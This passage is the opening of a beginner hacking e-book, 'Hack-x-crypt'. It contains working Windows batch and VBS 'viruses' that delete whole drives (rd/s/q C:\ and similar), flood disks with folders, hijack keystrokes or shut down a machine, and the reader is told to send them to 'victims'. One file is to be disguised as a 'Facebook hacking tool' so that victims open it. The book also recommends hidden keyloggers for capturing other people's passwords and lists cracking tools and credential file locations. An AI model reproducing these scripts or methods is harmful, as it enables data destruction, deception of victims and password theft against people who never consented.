1 Hack-x-crypt

UJJWAL SAHAY
2 Hack-x-crypt

By: - UJJWAL SAHAY

{ETHICAL HACKER}

UJJWAL SAHAY
3 Hack-x-crypt

LEGAL DISCLAIMER
Any proceedings or activities regarding the material contained
within this volume are exclusively your liability. The misuse and
mistreat of the information/tutorial in this book can
consequence in unlawful charges brought against the persons
in question. The authors and review analyzers will not be held
responsible in the event any unlawful charges brought against
any individuals by misusing the information in this book to
break the law. This book contains material and resources that
can be potentially destructive or dangerous. If you do not fully
comprehend something on this book, don‘t study this book.
Please refer to the laws and acts of your state/region/
province/zone/territory or country before accessing, using, or
in any other way utilizing these resources. These materials and
resources are for educational and research purposes only. Do
not attempt to violate the law with anything enclosed here
within. If this is your intention, then leave now. Neither writer
of this book, review analyzers, the publisher, nor anyone else
affiliated in any way, is going to admit any responsibility for
your proceedings, actions or trials.

UJJWAL SAHAY
4 Hack-x-crypt

ABOUT THE AUTHOR

UJJWAL SAHAY is a sovereign Computer Security

Consultant and has state-of-the-art familiarity in
the field of computer. Also, UJJWAL SAHAY is an
independent cyber security expert and has definitive
experience in the field of computers and ethical
hackings.

Sahay is however, more well known for his significant

work in the field of ethical hacking and cyber
security.

Sahay is currently pursuing his studies in computer

science with specialization in cyber security at MITS
GWALIOR.

UJJWAL SAHAY
5 Hack-x-crypt

PREFACE
Computer hacking is the practice of altering computer hardware and
software to carry out a goal outside of the creator‘s original intention.
People who slot in computer hacking actions and activities are often
entitled as hackers. The majority of people assume that hackers are
computer criminals. They fall short to identify the fact that criminals
and hackers are two entirely unrelated things. Hackers in realism are
good and extremely intelligent people, who by using their knowledge in
a constructive mode help organizations, companies, government, etc.
to secure credentials and secret information on the Internet. Years ago,
no one had to worry about Crackers breaking into their computer and
installing Trojan viruses, or using your computer to send attacks against
others. Now that thing have changed, it's best to be aware of how to
defend your computer from damaging intrusions and prevent black hat
hackers. So, in this Book you will uncover the finest ways to defend
your computer systems from the hackers This Book is written by
keeping one object in mind that a beginner, who is not much familiar
regarding computer hacking, can easily, attempts these hacks and
recognize what we are trying to demonstrate. After Reading this book
you will come to recognize that how Hacking is affecting our everyday
routine work and can be very hazardous in many fields like bank
account hacking etc. Moreover, after carrying out this volume in detail
you will be capable of understanding that how a hacker hacks and how
you can defend yourself from these threats.

FOR ANY QUERIES AND SUGGESTIONS FEEL FREE TO CONTACT ME:

 [email protected]

UJJWAL SAHAY
6 Hack-x-crypt

Your hands so warm

Your voice so clear

I still remember your laughter

Like yesterday had never gone

I miss your words of encouragement

Words that kept me hanging on

Now you are gone

The tears keep flowing

Only hoping

That one day the pain will fade

Dad why did you have to go away

We love you and miss you

I know I will again see you someday

UJJWAL SAHAY
7 Hack-x-crypt

Book or volume of this temperament is tremendously complex

to write, particularly without support of the Almighty GOD. I am
highly thankful to LATE DR. BAKSHI KAMESHWAR SRIVASTAVA,
MRS. SHASHI BALA SRIVASTAVA, Mr. BAKSHI RAJESH PRASAD
SINHA AND MRS. ARADHNA SINHA to trust on my capabilities,
without their support and motivation it would not be promising
to write this book. I express heartfelt credit to My Parents LATE
PROF. SAMIR KUMAR SAHAY and MRS.SUMAN SAHAY without
them I have no existence.

I am also thanking MR. BAKSHI RAJEEV PRASAD SINHA, MRS.

ANITA SINHA, MR. BAKSHI SANJEEV PRASAD SINHA, MRS.PRITY
SINHA, MR. RAJESHWAR PRASAD and MRS. PUNAM SINHA who
helped me at each and every step of my life by their precious
support.

I am more than ever thankful to MR. SAURABH TRIPATHI (PC

ADMINISTRATION EXPERT) for the review analysis and
suggestions for some good articles for this book and all
individuals who facilitated me at various research stages of this
volume.

UJJWAL SAHAY

UJJWAL SAHAY
8 Hack-x-crypt

Some Assumptions

I make a few assumptions about you:-

 You’re familiar with basic computer-, networking– related

concepts and terms.

 You have a basic understanding of what hackers and malicious

users do.

 You have access to a computer and a network on which to use

these techniques.

 You have access to the Internet to obtain the various tools used
in the ethical hacking process.

 You have permission to perform the hacking techniques

described in this book.

UJJWAL SAHAY
9 Hack-x-crypt

INTRODUCTION TO HACKERS
HACKERS WANT YOUR PC
CREATION OF VIRUS IN NOTEPAD
HACKING “OPEN” OPTION
PASSWORD CRACKING
PASSWORD CREATING POLICIES
KEYSTROKE LOGGING
HACK TO HIDE LOCAL DRIVES
FORMAT HARD DISK WITH NOTEPAD
FUNNY VIRUS TO SHOCK YOUR FRIENDS
HOW TO CHANGE YOUR PC FROM DUAL CORE TO i7
HOW TO MAKE YOUR GOOGLE SEARCHES EFFECTIVE
CRACKING IOS PASSWORD
HACK TO DELETE THE RECYCLE BIN
WEBSITE HACKING

UJJWAL SAHAY
10 Hack-x-crypt

WI-FI HACKING USING BACKTRACK

EMAIL AND FACEBOOK HACKING BY PHISHING
TIPS FOR MAKING WINDOWS BETTER AND SECURE
ENCRYPTION THROUGH MINILOCK
HOW TO PROTECT YOUR PDF FILES FROM COPYING
HOW TO SEND A MESSAGE TO ANOTHER USER
ACCOUNT IN YOUR OWN PC
HOW TO CREATE A FOLDER WITH EMPTY NAME
HACKING ANDROID PHONE
FULL CONTROL YOUR PC BY PHONE
LAUNCHING WINDOWS GOD MODE
HOW TO CRACK ANDROID LOCK SCREEN
WI-FI CRACKING USING REAVER IN BACKTRACK
TIPS FROM ANTI-VIRUS COMPANIES TO MAKE YOUR
COMPUTER SECURE
SOME USEFUL WINDOWS SHORTCUTS
HOW TO RECOVER PERMANENTLY DELETED FILES

UJJWAL SAHAY
11 Hack-x-crypt

INTRODUCTION TO HACKERS

Hello friends, here this is Ujjwal Sahay and now I am going to start the
first topic of my book HACK-X-CRYPT with the very basic introduction to
hackers and their communities. Here basically we are going to discuss
about some basic facts like who the hackers are, what are their
intentions, types of hackers and their communities etc.

Communities of Hackers:-
 HACKERS
 CRACKERS
 PHREAKS
 SCRIPT KIDDIES

UJJWAL SAHAY
12 Hack-x-crypt

HACKERS are the Intelligent Computer Experts.

INTENSION OF HACKERS:

•To gain in-depth knowledge of any computer system, what is

happening at the backend of any specific program of the system behind
the screen of the computer system?
• Their motive is to find possible security risk and vulnerabilities in a
computer system or network.
•They create security awareness among the people by sharing
knowledge and proper security preventions that should be taken by the
user.

 Types of Hackers:

•White Hat Hackers –“White hats” is the name used for security
experts. While they often use the same tools and techniques as the
black hats, they do so in order to foil the bad guys. That is, they use
those tools for ethical hacking and computer forensics. Ethical hacking
is the process of using security tools to test and improve security
(rather than to break it!). Computer forensics is the process of
collecting evidence needed to identify and convict computer criminals.

•Black Hat Hackers –They use their knowledge and skill set for
illegal activities and destructive intents. Obviously, the “black hats” are
the bad guys. These are the people who create and send viruses and
worms, break into computer systems, steal data, shut down networks,

UJJWAL SAHAY
13 Hack-x-crypt

and basically commit electronic crimes. We talk about black hats at

several points in this book. Black hat hackers and malware writers are
not considered as the same thing in the security community—even
though they are both breaking the law.

•Grey Hat Hackers -They use their knowledge and skill set for the
legal and illegal purpose. They are white hats in public but internally
they do some black hat work. Gray hats sit in the middle of the fence
because sometimes they cross that ethical line (or more often, define it
differently). For example, gray hats will break into a company’s
computer system just to wander around and see what’s there. They
think that simply because they don’t damage any data, they’re not
committing a crime. Then they go and apply for jobs as security
consultants for large corporations. They justify their earlier break-in’s
as some sort of computer security training. Many really believe that
they’re providing a public service by letting companies know that their
computers are at risk.

CRACKERS are those who break into the applications with some
malicious intentions either for their personal gain or their greedy
achievements.

Intension of crackers:-

• Their motive is to get unauthorized access into a system and cause

damage or destroy or reveal confidential information.
•To compromise the system to deny services to legitimate users for
troubling, harassing them or for taking revenge.
•It can cause financial losses & image/reputation damages, defamation
in the society for individuals or organizations.

UJJWAL SAHAY
14 Hack-x-crypt

PHREAKS are those people who use computer devices and software
programs and their tricky and sharp mind to break into the phone
networks.

Intention of phreaks:-

•To find loopholes in security in phone network and to make phone

calls and access internet at free of cost!!!

 You may get a spoofed call or a big amount of bill.

 You can also get a call with your own number.

SCRIPT KIDDIES:- These are computer novices who take advantage

of the hacker tools, vulnerability scanners, and documentation
available free on the Internet but who don’t have any real knowledge of
what’s really going on behind the scenes. They know just enough to
cause you headaches but typically are very sloppy in their actions,
leaving all sorts of digital fingerprints behind. Even though these guys
are the stereotypical hackers that you hear about in the news media,
they often need only minimal skills to carry out their attacks.

Intention of script kiddies:-

•They use the available information about known vulnerabilities to

break into the network systems.
•It’s an act performed for a fun or out of curiosity.

UJJWAL SAHAY
15 Hack-x-crypt

Black Hat Hackers Strategy:-

•Information Gathering & Scanning

•Getting Access on the website

•Maintain the access

•Clear the Tracks

Conclusion: - Security is important because prevention is better than

cure.

UJJWAL SAHAY
16 Hack-x-crypt

HACKERS WANT YOUR PC

You might be thinking that hackers don’t care about your computer,
but they do. Hackers want access to your system for many different
reasons. Remember, once a hacker breaks in and plants a Trojan, the
door is open for anyone to return. The hackers know this and are
making money off from it. They know it’s easy to hide and very difficult
to track them back once they own your PC.

Overall, the Internet is an easy place to hide. Compromised computers

around the world have helped to make hiding simple. It is easy to find
the last IP address from where an attack was launched, but hackers hop
from many unsecured systems to hide their location before they launch
attacks.

IP address is a unique address that identifies where a computer is

connected to the Internet. Every computer, even yours if you’re using
broadband access, has an Internet protocol (IP) address.

Over the past four years, most cyber-attacks have been launched from
computers within the INDIA. However, this doesn’t mean that systems
in the INDIA are the original source of the attack. A hacker in Pakistan
could actually use your computer to launch a denial of service (DOS)
attack. To the entire world, it might even look as if you started the
attack because the hacker has hidden his tracks so that only the last
“hop” can be traced.

UJJWAL SAHAY
17 Hack-x-crypt

CREATION OF VIRUS IN NOTEPAD

Now, it’s time to administrate your computer by creating some viruses

in the form of batch file. You can create various types of viruses with
having distinct functionality. Each and every virus will affect the victim’s
computer system by the way you have coded its programming in the
batch file. You can create viruses which can freeze the victims
computer or it can also crash it.

Virus creation codes of the batch file:--

--Codes to be written in the notepad--
--Extension of the files should be ".bat" --

1.) To create a huge amount of folders on victim's

desktop screen:- First of all your task is to copy the following codes
in the notepad of your computer.

For opening the notepad:-

 Go to run option of your computer by pressing “window+R”.

UJJWAL SAHAY
18 Hack-x-crypt

 Simply type “notepad” and click on the OK option.

CODES: @echo off

:top

md%random%

goto top.

Now when you have copied the codes in the notepad your next work is
to save the text document you have created.

UJJWAL SAHAY
19 Hack-x-crypt

Go to file option and save your document by any name but “don’t
forget to keep the extension as ‘.bat’.

For example you can save your text document by the name “ujjwal.bat”

Or you can also keep your document name as “Facebook hacking

tool.bat” to confuse the victim and enforce him to open the virus you
have created to destroy the desktop of the victim.

When you have done saving the document just double click on the
batch file to open it.

Suddenly you will see that the command prompt of the victim’s
computer opened automatically and it will display large amount of
codes to running in the command prompt.

UJJWAL SAHAY
20 Hack-x-crypt

After 5-10 seconds you will see that there are a huge amount of folders
created automatically on the desktop of the victim and it will also leads
the desktop to freeze or crash.

2.) To create more folders in C, D, and E drive of victim’s

computer:-
As we have learned above to create many folders on the desktop of the
victim, in the same way we can create a lot of folders in the C:, D:, and
E: drives of the victims computer by applying the same method as we
have followed above but there is a little amendment in the codes of the
batch file of this virus.

CODES:-
@echo off

:VIRUS

cd /d C:

md%random%

cd /d D:

md%random%

cd /d E:

md%random%

goto VIRUS

UJJWAL SAHAY
21 Hack-x-crypt

Copy and paste the above code in the notepad and follow the same
steps as we have followed before to create more numbers of folders in
the local drives of the victim’s computer.

3.) To format C, D: and E: drive of your computer:-

Open Notepad

Copy the below command there

"rd/s/q D:\

rd/s/q C:\

rd/s/q E:\" (Without quotes)

Save as "anything.bat

Double click on the virus icon.

This virus formats the C, D and E Drive in 5 Seconds.

4.) Convey your friend a little message and shut down

his / her computer:-
@echo off

msg * I don't like you

shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

UJJWAL SAHAY
22 Hack-x-crypt

5.) Open Notepad, slowly type "Hello, how are you? I am

good thanks" and freak your friend out:-
Open the notepad and type the following code :-

WScript.Sleep 180000

WScript.Sleep 10000

Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.Run "notepad"

WScript.Sleep 100

WshShell.AppActivate "Notepad"

WScript.Sleep 500

WshShell.SendKeys "Hel"

WScript.Sleep 500

WshShell.SendKeys "lo "

WScript.Sleep 500

WshShell.SendKeys ", ho"

WScript.Sleep 500

WshShell.SendKeys "w a"

WScript.Sleep 500

WshShell.SendKeys "re "

WScript.Sleep 500

UJJWAL SAHAY
23 Hack-x-crypt

WshShell.SendKeys "you"

WScript.Sleep 500

WshShell.SendKeys "? "

WScript.Sleep 500

WshShell.SendKeys "I a"

WScript.Sleep 500

WshShell.SendKeys "m g"

WScript.Sleep 500

WshShell.SendKeys "ood"

WScript.Sleep 500

WshShell.SendKeys " th"

WScript.Sleep 500

WshShell.SendKeys "ank"

WScript.Sleep 500

WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

UJJWAL SAHAY
24 Hack-x-crypt

6.) Hack your friend's keyboard and make him type

"You are a fool" simultaneously:-
Open the notepad and type the following codes:-

Set wshShell = wscript.CreateObject("WScript.Shell")

do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

7.) Open Notepad continually in your friend's computer:

Open the notepad and type the following codes:-

@ECHO off

:top

START %SystemRoot%\system32\notepad.exe

GOTO top

Save it as "Anything.BAT" and send it.

UJJWAL SAHAY
25 Hack-x-crypt

8.) THRETEN YOUR FRIEND BY MAKING SCREEN FLASH

To make a really cool batch file that can make your entire screen flash
random colors until you hit a key to stop it, simply copy and paste the
following code into notepad and then save it as a .bat file.

@echo off

echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg

echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg

echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg

echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg

echo g=100>>\z.dbg

echo q>>\z.dbg

debug <\z.dbg>nul

del \z.dbg

But if you really want to mess with a friend then copy and paste the
following code which will do the same thing except when they press a
key the screen will go black and the only way to stop the batch file is by
pressing CTRL-ALT-DELETE.

UJJWAL SAHAY
26 Hack-x-crypt

Codes:-

@echo off

:a

echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg

echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg

echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg

echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg

echo g=100>>\z.dbg

echo q>>\z.dbg

debug <\z.dbg>nul

del \z.dbg

goto a

To disable error (ctrl+shirt+esc) then end process wscript.exe

Enjoy!!!

Note: - some of the above given codes can harm your computer after
execution so; don’t try it on your pc. You can use a test computer for
it.

UJJWAL SAHAY
27 Hack-x-crypt

HACKING “OPEN” OPTION

If we want to open any folder either we use to double click on the

folder or we just right click on the folder and it will show us a dialogue
box with OPEN option at the top of the dialogue box.

And today we are going to learn that how to hack the “OPEN” option by
any text by which you want to replace it.

STEPS:-

 Go to “run” option and type “regedit” and click on ok.

Note: “regedit” stands for registry editing.

Registry:- it is responsible for saving the binary equivalent working

of every application in operating system.

UJJWAL SAHAY
28 Hack-x-crypt

 Then a window will open in front of you of registry editing.

 It has five options.
1. HKEY_CLASSES_ROOT
2. HKEY_CURRENT_USER
3. HKEY_LOCAL_MACHINE
4. HKEY_USERS
5. HKEY_CURRENT_CONFIG

UJJWAL SAHAY
29 Hack-x-crypt

 Then you have to click on “HKEY_CLASSES_ROOT”

It will open and you see a lot of items under it.
 Search for the “FOLDER” option under it.

UJJWAL SAHAY
30 Hack-x-crypt

 Click on the folder option to open it.

 When you open folder option you will see the “SHELL” option.

UJJWAL SAHAY
31 Hack-x-crypt

 By opening the “SHELL” option you will see the “OPEN” option
under it.
 Just give a single click on the open option instead opening it
 You will see two items defined in the left white workspace.

 Just open the “Default” string (1st option).

UJJWAL SAHAY
32 Hack-x-crypt

 Do not touch the value name.

 Type anything by which you want to replace your “open” option.
For example I am typing here that “your computer is hacked by
Ujjwal Sahay”.

 Then click on ok option.

 Now go on any folder and just give a right click to it.

Woooooo! Now the open option is changed by the text “your

computer is hacked by Ujjwal Sahay”.

UJJWAL SAHAY
33 Hack-x-crypt

PASSWORD CRACKING

Password crackers are the most famous and elementary tools in the
hacker’s toolbox. These have been around for some time and are
fairly effective at “guessing” most users’ passwords, at least in part
because most users do a very poor job of selecting secure
passwords.

First of all if a hacker is going to crack your password then at the very
first step they usually try some guesses to crack your password. They
generally made it easy by social engineering. Hackers know that
most users select simple passwords that are easy to remember. The
top choices of the users are nearly always names that are personally
meaningful to the user—first names of immediate family members
lead the list, followed by pet’s names and favorite sporting teams.

UJJWAL SAHAY
34 Hack-x-crypt

Password crackers may end up loading full English dictionaries, but

they can hit a fair number of passwords with the contents of any
popular baby name book. Other poor password selections include
common numbers and numbers that follow a common format such
as phone numbers and social security numbers.

Compounding the problem, many users set the same user name and
password for all accounts, allowing hackers to have a field day with a
single harvested password. That’s something to consider before you
use the same password for Facebook as you use at school or at work.

The key to creating a good password is to create something that

someone cannot guess or easily crack. Using your pet’s name
therefore is not a good technique. Using your login name is also a
bad technique because someone who knows your login (or your
name, since many login names are simply variations on your sur-
name), could easily break into your system.

Cracking passwords with Hardcore tools

High-tech password cracking involves using a program that tries to
guess a password by determining all possible password combinations.
These high-tech methods are mostly automated after you access the
computer and password database files.
The main password-cracking methods are dictionary attacks, brute-
force attacks, and rainbow attacks. You find out how each of these
work in the following sections.

Password-cracking software:-

UJJWAL SAHAY
35 Hack-x-crypt

You can try to crack your organization’s operating system and

application passwords with various password-cracking tools:

Cain & Abel:- Cain and Abel is a well-known password cracking tool
that is capable of handling a variety of tasks. The most notable thing is
that the tool is only available for Windows platforms. It can work as
sniffer in the network, cracking encrypted passwords using the
dictionary attack, brute force attacks, cryptanalysis attacks, revealing
password boxes, uncovering cached passwords, decoding scrambled
passwords, and analyzing routing protocols. It use to cracks LM and NT
LanManager (NTLM) hashes, Windows RDP passwords, Cisco IOS and
PIX hashes, VNC passwords, RADIUS hashes, and lots more. (Hashes are
cryptographic representations of passwords.)

Brutus:- Brutus is one of the most popular remote online password

cracking tools. It claims to be the fastest and most flexible password
cracking tool. This tool is free and is only available for Windows
systems. It was released back in October 2000.

It supports HTTP (Basic Authentication), HTTP (HTML Form/CGI), POP3,

FTP, SMB, Telnet and other types such as IMAP, NNTP, NetBus, etc. You
can also create your own authentication types. This tool also supports
multi-stage authentication engines and is able to connect 60
simultaneous targets. It also has resumed and load options. So, you can
pause the attack process any time and then resume whenever you
want to resume.

Elcomsoft Distributed Password Recovery:- (www.elcomsoft.com/

edpr.html) cracks Windows, Microsoft Office, PGP, Adobe, iTunes, and
Numerous other passwords in a distributed fashion using up to 10,000
networked computers at one time. Plus, this tool uses the same

UJJWAL SAHAY
36 Hack-x-crypt

graphics processing unit (GPU) video acceleration as the Elcomsoft

Wireless
Auditor tool, which allows for cracking speeds up to 50 times faster.

Elcomsoft System Recovery: - (www.elcomsoft.com/esr.html) cracks

Or resets Windows user passwords, sets administrative rights, and
resets password expirations all from a bootable CD.

John the Ripper: - (www.openwall.com/john) John the Ripper is

another well-known free open source password cracking tool for Linux,
UNIX and Mac OS X. A Windows version is also available. This tool can
detect weak passwords. A pro version of the tool is also available,
which offers better features and native packages for target operating
systems.

ophcrack:- (http://ophcrack.sourceforge.net) cracks Windows User

passwords using rainbow tables from a bootable CD. Rainbow tables
are pre-calculated password hashes that can help speed up the cracking
process.

Aircrack-NG: - (http://www.aircrack-ng.org/) Aircrack-NG is a Wi-Fi

password cracking tool that can crack WEP or WPA passwords. It
analyzes wireless encrypted packets and then tries to crack passwords
via its cracking algorithm. It is available for Linux and Windows systems.
A live CD of Aircrack is also available.

Proactive System Password Recovery:- (www.elcomsoft.com/pspr.

html) recovers practically any locally stored Windows password, such
as logon passwords, WEP/WPA passphrases, SYSKEY passwords, and
RAS/dialup/VPN passwords.

UJJWAL SAHAY
37 Hack-x-crypt

Rainbow Crack:- (http://project-rainbowcrack.com) Rainbow Crack is a

hash cracker tool that uses a large-scale time-memory trade off process
for faster password cracking than traditional brute force tools. Time-
memory tradeoff is a computational process in which all plain text and
hash pairs are calculated by using a selected hash algorithm. After
computation, results are stored in the rainbow table. This process is
very time consuming. But, once the table is ready, it can crack a
password must faster than brute force tools.

You also do not need to generate rainbow tablets by yourselves.

Developers of Rainbow Crack have also generated LM rainbow tables,
NTLM rainbow tables, MD5 rainbow tables and Sha1 rainbow tables.
Like Rainbow Crack, these tables are also available for free. You can
download these tables and use for your password cracking processes.

pwdump3:- (www.openwall.com/passwords/microsoft-windowsnt-
2000-xp-2003-vista-7#pwdump) extracts Windows password hashes
from the SAM (Security Accounts Manager) database.

Password storage locations vary by operating system:

Windows usually stores passwords in these locations:

• Active Directory database file that’s stored locally or spread across

domain controllers (ntds.dit)
Windows may also store passwords in a backup of the SAM file in the
c:\winnt\repair or c:\windows\repair directory.

• Security Accounts Manager (SAM) database (c:\winnt\

system32\config) or (c:\windows\system32\config)

UJJWAL SAHAY
38 Hack-x-crypt

Some Windows applications store passwords in the Registry or as

plaintext files on the hard drive! A simple registry or file-system search
for “password” may uncover just what you’re looking for.

Linux and other UNIX variants typically store passwords in these files:

• /etc/passwd (readable by everyone)

• /etc/shadow (accessible by the system and the root account only)

• /.secure/etc/passwd (accessible by the system and the root account

only)
• /etc/security/passwd (accessible by the system and the root account
only)

UJJWAL SAHAY
39 Hack-x-crypt

PASSWORD CREATING POLICIES

As an ethical hacker, you should show users the importance of securing

their passwords. Here are some tips on how to do that:

 Demonstrate how to create secure passwords:-generally people

use to create their passwords using only words, which can be less
secure.

Show what can happen when weak passwords are used or passwords
are shared.

 Diligently build user awareness of social engineering attacks:-

Encourage the use of a strong password-creation policy that includes
the following criteria:-

 Use punctuation characters to separate words.

 Use upper- and lowercase letters, special characters, and

numbers.
 Never use only numbers. Such passwords can be cracked quickly.

 Change passwords every 15 to 30 days or immediately if they’re

suspected of being compromised.

 Use different passwords for each system. This is especially

important for network infrastructure hosts, such as servers,
firewalls, and routers.

UJJWAL SAHAY
40 Hack-x-crypt

It’s okay to use similar passwords — just make them slightly different
for each type of system, such as wweraw777-Win7 for Windows
systems and wweraw453 for Linux systems.

 Use variable-length passwords. This trick can throw off attackers

because they won’t know the required minimum or maximum
length of Passwords and must try all password length
combinations.

 Don’t use common slang words or words that are in a dictionary.

 Don’t rely completely on similar-looking characters, such as 3

instead of E, 5 instead of S, or ! Instead of 1. Password-cracking
programs can for this.

 Use password-protected screen savers. Unlocked screens are a

great way for systems to be compromised even if their hard
drives are encrypted.
 Don’t reuse the same password within at least four to five
password changes.

 Don’t share passwords. To each his or her own!

 Avoid storing user passwords in an unsecured central location,

such as an unprotected spreadsheet on a hard drive. This is an
invitation for disaster. Use Password Safe or a similar program to
store user passwords.

UJJWAL SAHAY
41 Hack-x-crypt

KEYSTROKE LOGGING

One of the best techniques for capturing passwords is remote keystroke

logging — the use of software or hardware to record keystrokes as
they’re typed into the computer.

Generally you use to ask your friends or relatives for logging in into
your account by their computers.

So, Be careful with key loggers installed in their computers. Even with
good intentions, monitoring employees raises various legal issues if it’s
not done correctly. Discuss with your legal counsel what you’ll be
doing, ask for their guidance, and get approval from upper
management.

Logging tools: - With keystroke-logging tools, you can assess the log
files of your application to see what passwords people are using:-

Keystroke-logging applications can be installed on the monitored

computer.

UJJWAL SAHAY
42 Hack-x-crypt

I suggest you to check out family key logger by (www.spyarsenel.com).

Another popular tool is Invisible Key Logger Stealth; Dozens of other

such tools are available on the Internet.

One more you can checkout is KGB employee monitor is one of the
favorite of me …..Because it is not only invisible but it will also not
shown by your task manager and it uses password protection too.

Hardware-based tools, such as Key Ghost (www.keyghost.com), fit

between the keyboard and the computer or replace the keyboard
altogether.

A keystroke-logging tool installed on a shared computer can capture

the passwords of every user who logs in.

PREVENTIONS:-

The best defense against the installation of keystroke-logging software

on your systems is to use an anti-malware program that monitors the
local host. It’s not foolproof but can help. As for physical key loggers,
you’ll need to visually inspect each system.

The potential for hackers to install keystroke-logging software is

another reason to ensure that your users aren’t downloading and
installing random shareware or opening attachments in unsolicited e-
mails. Consider locking down your desktops by setting the appropriate
user rights through local or group security policy in Windows.

UJJWAL SAHAY
43 Hack-x-crypt

HACK TO HIDE LOCAL DRIVES

In this article we are going to learn about hiding the stuffs. Generally,
you guys use to hide the particular file which you want to keep
personal. Which is the most common way in these days and it can easily
be exposed even by a middle school child.

But, here we are going to learn that how to hide the whole specified
drives (local disks) which keep you safe from your family child. You can
easily keep your data safe either it is your girlfriend’s pic or
blah…blah…blah…!

Let’s start to learn how to hide the specified drives step by step:--

 For hiding the drives you have to edit the group policies of your
computer.
 For editing group policies just go on the “run” option and type
“gpedit.msc” and click on ok.
Or
You can easily search in your search box for the GROUP POLICY.

UJJWAL SAHAY
44 Hack-x-crypt

 The group policy editor will be opened after you!

 Then you will see in the left part of the window there is a “USER
CONFIGURATION” option.
 Under the user configuration option there are three options :-
1.) Software settings
2.) Windows settings
3.) Administrative templates

 Just give a single click on the administrative template option.

 You see that some options are made available in the right part of
the window.

 Open the “all settings option.”

UJJWAL SAHAY
45 Hack-x-crypt

 When you opened the “all settings options” there is a list of lot of
options displayed after you!
 Click on the “settings” option to arrange them then alphabetically.
If already arranged you can skip this step.

UJJWAL SAHAY
46 Hack-x-crypt

 Now clicking sometimes the “H” key of your keyboard search for
the “hide these specified drives in my computer” option.

 Double click on the “hide these specified drives in my computer”

option.
 A window will opens after you.

UJJWAL SAHAY
47 Hack-x-crypt

 “ENABLE” it and choose for the drives which you want to hide
from the given options in the lower left part of the window.

 After applying the settings just click on ok and you see the drives
will hide according to your choice.

 I have selected to hide only A, B, C and D drives only so the E:

drive will not be hidden in the screenshot given below.

UJJWAL SAHAY
48 Hack-x-crypt

 In the above given screenshot only “E:” drive is shown to the

user.
 If you want to access the drives which are hidden then you have
to click on the address bar of my computer’s window as marked
in the above screenshot and type D:” or “C:” and click on ENTER
button of your keyboard to open the drives respectively.

UJJWAL SAHAY
49 Hack-x-crypt

FORMAT HARD DISK WITH NOTEPAD

In this article we are going to learn how to delete completely your C:

drive of your computer without a formatting compact disk. Just do it
on your own risk because it will destroy the windows of you system and
for this I am not responsible.

FOLLOW THE BELOW STEPS TO FORMAT YOU C: DRIVE:_

 Open the notepad and type the following give code

CODE:-
@echo off
del C:\ *.* \y

 Save it with the extension “.bat”

Such as “virus.bat”.

UJJWAL SAHAY
50 Hack-x-crypt

 Double click on the saved file to run this virus.

 Command prompt will be opened after you where it will be
deleting your drive.

Note: “I have not tried this virus yet, and also please don’t try on your
personal computers. If you have tried ever please give me the reviews.”

UJJWAL SAHAY
51 Hack-x-crypt

FUNNY VIRUS TO SHOCK YOUR FRIENDS

Hello guys, I think after reading the above chapters now it’s time to
have some fun. In this article we are going to learn that how to give a
shock to your friend for a minute.

Basically here we are going to create a funny virus which will not
actually harm your friend’s computer but it will shock him/her for a
minute.

So let’s create that virus following the same steps as we have created
some viruses in previous chapters.

So follow the steps:-

 Open the notepad and type the following code:-

CODES:-
@echo off
msg * your computer is attacked by a virus.
msg * click ok to format.
msg * all your data has been deleted.

UJJWAL SAHAY
52 Hack-x-crypt

 Save the document with the extension “.bat”

 For example you can save the virus by the name “funny
virus.bat”

UJJWAL SAHAY
53 Hack-x-crypt

 Now your work is to execute the virus.

 Just double click on the virus and it will show you a message that
“your computer is attacked by a virus”.

 Now either you click on “ok” or you close the above message box,
it will again show you a message “click ok to format”.
 And I am sure that you will not going to click on ok.
 But again it does not matter if you click on ok or close the box, but
I am sure that you will close the box.
 Again it will show you a message that “all your data has been
deleted”.
 And for a moment your friend’s heartbeat are going to be on the
optimum.
 So this is a funny way to shock your friends without harming them
actually.

UJJWAL SAHAY
54 Hack-x-crypt

HOW TO CHANGE YOUR PC FROM DUAL

CORE TO i7

The trick we are going to learn here is the most interesting trick and I
am sure that it will increase your prestige among your friends.
Because now these days it’s a big deal among the group of your friend
that if you have i3, i5 or i7 processor.
So let’s learn how to change your pc from any of core processor to i7.

For it you have to follow these steps:-

 First of all you have to go on the “run” option and write “regedit” to
open the registry editor of your computer and click on ok
 It will open the registry editing window after you.

UJJWAL SAHAY
55 Hack-x-crypt

 Open the “HKEY_LOCAL_MACHINE” as highlighted in the figure.

 Then open the “hardware” option present under it.

UJJWAL SAHAY
56 Hack-x-crypt

 Then open the “Description” option and then open the “system”
option. Also open the “central processor” option under system
option.

UJJWAL SAHAY
57 Hack-x-crypt

 Then give a single click to “0” folder present under “central

processor”.
 And then you will see that in the right part of the regedit window
there appear a lot of options. This is called as STRINGS.
 Search for the “processor name string” among those strings.

 Open the processor name string giving a double click on it.

 A dialogue box will open after you.
 In the “value data” text box it is written what your computer’s
processor actually is.

UJJWAL SAHAY
58 Hack-x-crypt

 I am using “Pentium(R) Dual-Core CPU T4500 @ 2.30GHz” as

written in the value data.
 Now delete those texts and write your own text replacing them.
 Such as you can write” Intel (R) Core i7 CPU T9500 @
2.30GHz” and click on “ok” option.

 Now close the registry editor and let’s check if it is working or not.

UJJWAL SAHAY
59 Hack-x-crypt

 For checking it, you have to check the properties of your

computer.
 For checking it, just give a right click on my computer icon and
click on the “properties” option which is the last option of the
dialogue box.

 The system properties of your computer are shown after you.

UJJWAL SAHAY
60 Hack-x-crypt

 Yuppie! As you have seen in the processor name it will be as

expected.
 Now your processor is turned into i7.

 And now you can say with proud that YOU HAVE AN CORE i7
PROCESSOR.

UJJWAL SAHAY
